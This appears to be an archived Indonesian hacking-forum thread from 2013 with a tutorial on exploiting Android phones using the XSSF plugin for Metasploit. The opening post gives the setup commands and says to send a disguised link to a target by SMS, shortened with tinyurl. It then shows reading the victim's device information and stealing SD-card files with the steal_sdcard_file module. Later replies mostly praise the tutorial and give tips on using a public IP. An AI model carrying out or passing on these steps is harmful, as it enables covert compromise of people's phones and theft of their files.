+- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
+-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html)
+--- Forum: Exploitation (https://www.indonesianbacktrack.or.id/forum/forum-43.html)
+---- Forum: Metasploit (https://www.indonesianbacktrack.or.id/forum/forum-122.html)
+---- Thread: Exploit Android Menggunakan Xssf (/thread-5358.html)
Exploit Android Menggunakan Xssf - sonyrimawan - 11-24-2013
halo semua selamat pagi
di minggu yang cerah ini saya akan nyepam dikit. mohon jangan di masukin hati kalau ada yang kurang berkenan nanti ya :-bd
kalau misalnya sudah pernah ada yang posting saya minta maaf ya, jujur pada saat saya melakukan pencarian di forum tidak di temukan thread yang sama.
Spoiler! :
![[Image: 1460990_689962617680709_1249227499_n.jpg]](https://fbcdn-sphotos-c-a.akamaihd.net/hphotos-ak-prn2/q71/s720x720/1460990_689962617680709_1249227499_n.jpg)
kalau begitu langsung saja kita buka kali linux, backtrack, bugtraq, atau apapun yang penting bisa di pasang msfconsole ya.
langsung download dulu xssf pada directory msfconsolenya.
Quote:svn export http://xssf.googlecode.com/svn/trunk ./ --force
Spoiler! :
![[Image: 1467453_689962744347363_873054418_n.jpg]](https://fbcdn-sphotos-g-a.akamaihd.net/hphotos-ak-frc3/q71/s720x720/1467453_689962744347363_873054418_n.jpg)
setelah itu kita jalankan metasploit kita \m/
Quote:msfconsole
dan isikan
load xssf Port=80 Uri=/Xssf/ Public=true Mode=Verbose
Spoiler! :
![[Image: 1454734_689962704347367_1030133023_n.jpg]](https://fbcdn-sphotos-e-a.akamaihd.net/hphotos-ak-ash3/q71/s720x720/1454734_689962704347367_1030133023_n.jpg)
lalu masukan
Quote:xssf_urlsmaka akan muncul penampakan seperti ini
Spoiler! :
![[Image: 1470402_689962774347360_487717187_n.jpg]](https://fbcdn-sphotos-a-a.akamaihd.net/hphotos-ak-prn2/q71/s720x720/1470402_689962774347360_487717187_n.jpg)
sekarang lihat msfconsole kita, dan copy link di sebelah [+] XSSF logs page dan paste ke web browser kesayangan anda.
Spoiler! :
![[Image: 1470237_689962997680671_757338044_n.jpg]](https://fbcdn-sphotos-h-a.akamaihd.net/hphotos-ak-ash4/q71/s720x720/1470237_689962997680671_757338044_n.jpg)
sekarang lihat lah bagian [+] XSSF test page dan copy link di sampingnya, lalu paste kirimkan ke android target anda lewat sms atau apapun. bisa di tutup menggunakan tinyurl atau semacamnya.
karena saya tidak punya android, maka saya pake vbox saja ya =))
Spoiler! :
![[Image: 1453377_689962974347340_1417305574_n.jpg]](https://fbcdn-sphotos-b-a.akamaihd.net/hphotos-ak-prn2/q71/s720x720/1453377_689962974347340_1417305574_n.jpg)
pada saat korban membuka link tersebut maka koban akan menyaksikan pemandangan seperti ini
Spoiler! :
![[Image: 1455092_689963107680660_1504504363_n.jpg]](https://fbcdn-sphotos-a-a.akamaihd.net/hphotos-ak-prn2/q71/s720x720/1455092_689963107680660_1504504363_n.jpg)
dan kita akan mendapatkan pemandangan seperti ini
Spoiler! :
![[Image: 1422603_689963164347321_1348717999_n.jpg]](https://fbcdn-sphotos-g-a.akamaihd.net/hphotos-ak-frc3/q71/s720x720/1422603_689963164347321_1348717999_n.jpg)
Spoiler! :
![[Image: 1466217_689963174347320_466036619_n.jpg]](https://fbcdn-sphotos-f-a.akamaihd.net/hphotos-ak-prn2/q71/s720x720/1466217_689963174347320_466036619_n.jpg)
sekarang coba saja kita ketik
Quote:xssf_information 1tadaaa. nongol dah tuh infonya si korban.
Spoiler! :
![[Image: 994369_689963254347312_857904323_n.jpg]](https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-prn1/q71/s720x720/994369_689963254347312_857904323_n.jpg)
sekarang android sudah resmi kena exploit, dan sekarang giliran kita untuk berkreasi mau di apakan android tersebut.
dengan:
Quote:search auxiliary/xssf
mau curi filenya?
bisa dengan memilih:
Quote:use auxiliary/xssf/public/android/steal_sdcard_file
Spoiler! :
![[Image: 1461235_689963357680635_1083694086_n.jpg]](https://fbcdn-sphotos-h-a.akamaihd.net/hphotos-ak-frc3/q71/s720x720/1461235_689963357680635_1083694086_n.jpg)
Spoiler! :
![[Image: 1468557_689963344347303_1074165059_n.jpg]](https://fbcdn-sphotos-b-a.akamaihd.net/hphotos-ak-frc3/q71/s720x720/1468557_689963344347303_1074165059_n.jpg)
dan secara otomatis android korban mengaksesnya dan nantinya akan muncul di log browser kita.
Spoiler! :
![[Image: 1473054_689963364347301_888857908_n.jpg]](https://fbcdn-sphotos-g-a.akamaihd.net/hphotos-ak-prn2/q71/s720x720/1473054_689963364347301_888857908_n.jpg)
tapi berhubung android saya tidak ada isinya karena hanya virtual, jadi kagak muncul apa".
silahkan di kembangkan sendiri dan bila ada yang lebih asik, silahkan di postingkan ke forum.
mohon maaf kalau ada yang kurang berkenan. hanya share saja semoga bermanfaat \m/
RE: Exploit Android Menggunakan Xssf - aristateles - 11-24-2013
Yes I love backtrack, hihihi #ketawaJahat
RE: Exploit Android Menggunakan Xssf - sonyrimawan - 11-24-2013
(11-24-2013, 08:08 AM)aristateles Wrote: Yes I love backtrack, hihihi #ketawaJahat
huwkwkkwk wah bahaya nih untung hapeku nokia 3315 =))
RE: Exploit Android Menggunakan Xssf - wine trochanter - 11-24-2013
itu pake ip publik ato gmna pak?
mau tes andro ane nih
RE: Exploit Android Menggunakan Xssf - sonyrimawan - 11-24-2013
pake ip publik bisa om. test aja. sesuaikan saja dengan ppp0 ente pak di ifconfig
RE: Exploit Android Menggunakan Xssf - child - 11-25-2013
ini baru namanya hacker :-bd
mantap bang tutornya :apn:
RE: Exploit Android Menggunakan Xssf - fl4zero - 11-25-2013
Nice tutor... penarasan pengen nyoba, tapi hape ane tigatigalimablas... :v
RE: Exploit Android Menggunakan Xssf - achmad_zzz - 11-25-2013
nambah ilmu nih.. boleh2 nih di coba, tapi ane kuliah dulu ya, hehe.. tahnks
RE: Exploit Android Menggunakan Xssf - owie - 11-25-2013
juoss gandoss om,, hehe
ntar coba2 deh,, jadi penasaran
RE: Exploit Android Menggunakan Xssf - Kresna - 11-26-2013
wihh om sony makin ganteng aja nih
.. Nice tutornya om , cek lemari kulkas